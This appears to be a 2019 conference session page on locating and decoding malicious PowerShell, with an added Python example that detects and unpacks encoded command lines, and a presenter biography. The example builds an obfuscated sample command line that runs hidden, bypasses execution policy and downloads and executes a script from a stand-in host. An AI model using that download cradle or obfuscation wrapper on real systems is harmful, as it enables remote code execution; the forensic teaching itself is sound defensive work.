CF-2003 Finding and Decoding Malicious PowerShell Scripts

Presented at Texas Cyber Summit 2019, Oct. 11, 2019, 1 p.m. (120 minutes)

Malicious PowerShell scripts have become a tool of choice for attackers. Although they are sometimes described as “fileless malware”, they do leave forensic artifacts that examiners can find. This session shows how to locate those artifacts and identify the activity of malicious PowerShell scripts. Once located, a script may contain several layers of obfuscation that must be decoded; the session covers decoding them by hand, as well as some light malware analysis of any embedded shellcode, through a series of hands-on labs.

Requirements:

  • Windows system or Windows VM.
  • The user must be able to turn off their AV.
  • Helpful if Python 2.7 is installed and added to the Path environment variable.
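As an added illustration of the locating and layer-by-layer decoding the abstract describes (example code written for this page, not material from the talk or its labs; it targets Python 3 rather than the Python 2.7 the requirements mention), the block below scans a few constructed process command lines, of the kind recorded in Security event 4688 when command-line auditing is enabled, for a `-EncodedCommand` payload, then peels the common wrapper shape: base64 of UTF-16LE for the outer command, and `DeflateStream`/`GZipStream` over `[Convert]::FromBase64String(...)` for the inner stage. The sample command lines, the `example.invalid` URL and the stage-two script are constructed for the example and do not come from any real case.

```python
import base64
import re
import zlib

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters>" followed by a long base64 token. The length floor keeps
# "-Exec Bypass" and "-ExecutionPolicy Unrestricted" from matching.
ENC_RE = re.compile(r"(?i)-e[a-z]*\s+([A-Za-z0-9+/]{20,}={0,2})")
# Inner stages usually hide the next layer in [Convert]::FromBase64String('...').
B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def decode_encoded_command(cmdline):
    """Return the script passed via -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not really base64 / not UTF-16LE
        return None


def peel_inner_layer(script):
    """Decode one FromBase64String(...) stage. The wrapper's own text tells us
    which decompression (DeflateStream / GZipStream) and which text encoding
    (Unicode = UTF-16LE, otherwise ASCII/UTF-8) the attacker's code will apply."""
    m = B64_RE.search(script)
    if not m:
        return None
    raw = base64.b64decode(m.group(1))
    if "DeflateStream" in script:
        raw = zlib.decompress(raw, -zlib.MAX_WBITS)      # raw DEFLATE, no zlib header
    elif "GZipStream" in script:
        raw = zlib.decompress(raw, 16 + zlib.MAX_WBITS)  # gzip container
    codec = "utf-16-le" if "Unicode" in script else "utf-8"
    return raw.decode(codec, errors="replace")


def decode_layers(cmdline, max_layers=10):
    """Return every layer from the command line inward; layers[-1] is the payload."""
    layers = []
    script = decode_encoded_command(cmdline)
    while script is not None and len(layers) < max_layers:
        layers.append(script)
        script = peel_inner_layer(script)
    return layers


def find_encoded_commands(lines):
    """Indexes of the log lines that carry an -EncodedCommand payload."""
    return [i for i, line in enumerate(lines) if decode_encoded_command(line) is not None]


# --- Constructed sample (not a real capture): a two-layer payload in the common
# "-Enc <base64 UTF-16LE>" -> "DeflateStream(FromBase64String(...))" -> script shape.
STAGE2 = "$w = New-Object Net.WebClient; IEX $w.DownloadString('http://example.invalid/s2.ps1')"


def build_sample_cmdline(payload):
    co = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)  # raw DEFLATE like .NET
    deflated = co.compress(payload.encode("utf-8")) + co.flush()
    wrapper = ("IEX (New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream("
               "[IO.MemoryStream][Convert]::FromBase64String('%s'),"
               "[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"
               % base64.b64encode(deflated).decode("ascii"))
    enc = base64.b64encode(wrapper.encode("utf-16-le")).decode("ascii")
    return "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + enc


SAMPLE_LINES = [  # constructed process command lines
    r"C:\Windows\System32\cmd.exe /c whoami",
    build_sample_cmdline(STAGE2),
    r"powershell.exe -ExecutionPolicy Unrestricted -File C:\Scripts\backup.ps1",
]

if __name__ == "__main__":
    for i in find_encoded_commands(SAMPLE_LINES):
        for depth, layer in enumerate(decode_layers(SAMPLE_LINES[i])):
            print("line %d, layer %d: %s" % (i, depth, layer[:80]))
```

The same `decode_layers` routine applies to the script text found in other artifacts (script block logging, event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, or a persisted Run-key value), since those carry the same wrapper shapes; what changes is only where the outer string is read from.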

Presenters:

  • Mari DeGrazia - Kroll Cyber Risk
    Mari DeGrazia is a Senior Vice President at Kroll Cyber Risk, which provides cyber security services on a global scale. Throughout her career, Mari has investigated high-profile breach cases, worked civil and criminal cases and provided testimony as an expert witness. She has written and released numerous programs/scripts to the forensics community; presented her research at industry conferences; and is a published author in several magazines. She is also a SANS instructor where she loves sharing her knowledge with students. She holds several certifications in addition to earning a B.S. in Computer Science from Hawaii Pacific University.
